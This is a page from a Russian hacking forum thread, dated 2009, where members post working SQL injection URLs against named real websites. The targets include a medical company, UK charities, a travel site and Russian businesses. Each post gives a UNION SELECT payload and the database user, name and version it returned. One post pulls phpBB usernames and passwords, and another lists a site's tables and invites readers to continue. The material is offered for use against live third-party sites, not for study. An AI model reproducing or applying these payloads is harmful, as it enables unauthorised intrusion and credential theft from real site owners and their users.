ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11131  
Старый 05.11.2009, 09:16
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.latodis-med.com/produs.php?id=74+UNION+SELECT+1,2,concat_ws(0x3a,v ersion(),database(),user(),@@version_compile_os),4 ,5,6,7,8,9,10,11,12,13+LIMIT+1,1--


Database Version: 5.0.82-msl-usrs-sure2-log
Database name: latodis_latodis
User name: veterinare@localhost
Os: unknown-linux-gnu
 
Ответить с цитированием

  #11132  
Старый 05.11.2009, 09:24
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://abstinenceeurope.org/blog/index.php?postid=-136+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9+--+
User: abstinence@localhost
Database: abstinencedb
Version: 4.1.22

Цитата:
http://www.autozap.ru/forum/index.php?postid=-7208+union+select+1,2,3,4,5,6,concat_ws(0x3a,user( ),database(),version())+--+
User: autozap@mail.autozap.ru
Database: autozap
Version: 5.0.24a-community-nt

Последний раз редактировалось Ctacok; 05.11.2009 в 09:49..
 
Ответить с цитированием

  #11133  
Старый 05.11.2009, 10:12
Kamik
Флудер
Регистрация: 02.12.2008
Сообщений: 4,294,967,295
Провел на форуме:
689466

Репутация: 155


Отправить сообщение для Kamik с помощью ICQ
По умолчанию

Сайт какойто авиакомпании

http://www.ctaholidays.net/beta/holiday_details.php?id=1225586740+union+select+1,2 ,3,4,5,6,7,concat_ws(0x3a,user(),database(),versio n()),9,10,11,12,13,14,15--

sercanak_main@localhost:sercanak_ctav2:5.0.81-community-log

Далее попал случайно

http://www.ctaholidays.net/beta/holiday_details.php?id=1225586740+union+select+1,t able_name,3,4,5,6,7,8,9,10,11,12,13,14,15+from+inf ormation_schema.tables+limit+21,100--

Table 'sercanak_ctav2.holiday_to_insurance' doesn't existUnknown column '_users' in 'where clause'
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home1/sercanak/public_html/ctaholidays/beta/classes/connection.cls.php on line 53

Дальше крутите сами
 
Ответить с цитированием

  #11134  
Старый 05.11.2009, 12:00
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

http://www.hlhclub.ru/state.php?id=-45+union+select+1,2,concat_ws(0x3a,user(),database (),version(),@@version_compile_os),4--

hlhclu01@fe74.hc.ru:wwwhlhclubru:4.1.25-logortbld-freebsd6.4
 
Ответить с цитированием

  #11135  
Старый 05.11.2009, 12:37
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию

http://www.discusmedia.com/catalog.php?id=24751+and+1=0+ Union Select 1,2,3,4,concat_ws(0x3a,user(),database (),version(),@@version_compile_os),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35

photoeu@74.220.215.75hotoeu:5.0.75c-linux-gnu
 
Ответить с цитированием

  #11136  
Старый 05.11.2009, 14:01
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

Цитата:
http://www.foodlink.ru/index.php?category=-4+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5--
5.0.87:food1@localhost:foodlink

Цитата:
http://www.el-star.ru/useful.php?id=1+union+select+1,concat_ws(0x3a,vers ion(),database(),user()),3,4,5,6,7,8--
4.1.25-log:wwwanthostnet:anthost@localhost

Цитата:
http://catalog.arh-info.ru/index.php?cat=2&subcat=8+union+select+1,2,3,concat _ws(0x3a,version(),database(),user()),5--
5.0.77:www_new_catalog:nmarroot@localhost

Цитата:
http://www.samarainfo.ru/index.php?category=13+union+select+1,2,concat_ws(0 x3a,version(),user(),database()),4,5
5.0.77:samarainfo_root@localhost:samara_info
Таблица: dev_admin1t
 
Ответить с цитированием

  #11137  
Старый 05.11.2009, 15:12
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию

Цитата:
http://www.marsvenus.com/members/articles.php?id=-42+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version(),@@version_compile_os),5,6,7,8,9%20, 10,11,12,13,14,15,16,17,18,19,20--
dbo204999831@localhost:db204999831
4.0.27-standardc-linux-gnu

Последний раз редактировалось *uNkN0Wn*; 05.11.2009 в 15:23..
 
Ответить с цитированием

  #11138  
Старый 05.11.2009, 16:50
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

http://www.komdiv.ru/viewnews.php?id=-9+union+select+1,2,3,4,group_concat(0x0b,column_na me),6+from+information_schema.columns+where+table_ name=0x70687062625f666f72756d7573657273--
MySQL 5.1.36-log
http://www.komdiv.ru/viewnews.php?id=-9+union+select+1,2,3,4,group_concat(0x0b,username, 0x3a,user_password),6+from+phpbb_forumusers--
 
Ответить с цитированием

  #11139  
Старый 05.11.2009, 18:00
Roston
Постоянный
Регистрация: 31.07.2008
Сообщений: 370
Провел на форуме:
2866942

Репутация: 350
Отправить сообщение для Roston с помощью ICQ
По умолчанию

Код:
http://www.skylink39.ru/catalog.php?id=64+union+select+1,2,3,concat_ws(0x203B20,user(),database(),version()),5,6,7,8,9,10,11,12,13+--+
User: skylink2_mysql@10.1.93.176
Database: skylink2_db
Version: 4.1.22-log
 
Ответить с цитированием

  #11140  
Старый 05.11.2009, 19:06
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

http://www.endchildpoverty.org.uk/news.php?id=-23+union+select+1,2,3,version(),5,6,7,8,9--

5.0.44

Код:
http://www.herpconstrust.org.uk/news/expand-news.php?id=-85+union+select+1,2,3,4,user(),6,7,8--
4.1.19-standard-log

Последний раз редактировалось 547; 05.11.2009 в 19:55..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ